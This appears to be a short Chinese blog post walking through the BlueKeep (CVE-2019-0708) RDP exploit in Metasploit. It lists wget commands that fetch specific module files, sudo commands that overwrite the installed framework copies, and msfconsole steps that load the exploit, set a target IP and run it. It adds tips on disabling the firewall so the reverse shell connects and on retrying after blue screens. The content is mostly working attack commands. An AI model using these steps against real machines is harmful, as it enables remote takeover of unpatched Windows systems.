准备操作
Linux
MacOS
1 2 3 4 5 6 7 8 9 10 11 | # Download wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb # Replace sudo cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb sudo cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb sudo cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb sudo cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb |
注意 还需要关闭系统防火墙 因为用到了反弹Shell
Exploit
开启
保险起见执行
Load module
接下来
查看配置
设置目标IP
有需要的话需要设置
msfconsole保险起见执行
reload_allLoad module
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce接下来
msf基本操作查看配置
info设置目标IP
set RHOSTS <target ip>有需要的话需要设置
target1 2 3 4 5 6 7 8 9 | Exploit targets: Id Name -- ---- 0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V) |
最后
run,遇到蓝屏 多试几次 或者 是哪一步配置出错
自己踩的坑
- 需要覆盖的文件没有全覆盖到 -> exploit的时候一直蓝屏
- 系统防火墙没有关 -> 一直拿不到反弹Shell (没想到竟然会经过防火墙 以为是一个机子的内部操作)
0 comments:
Post a Comment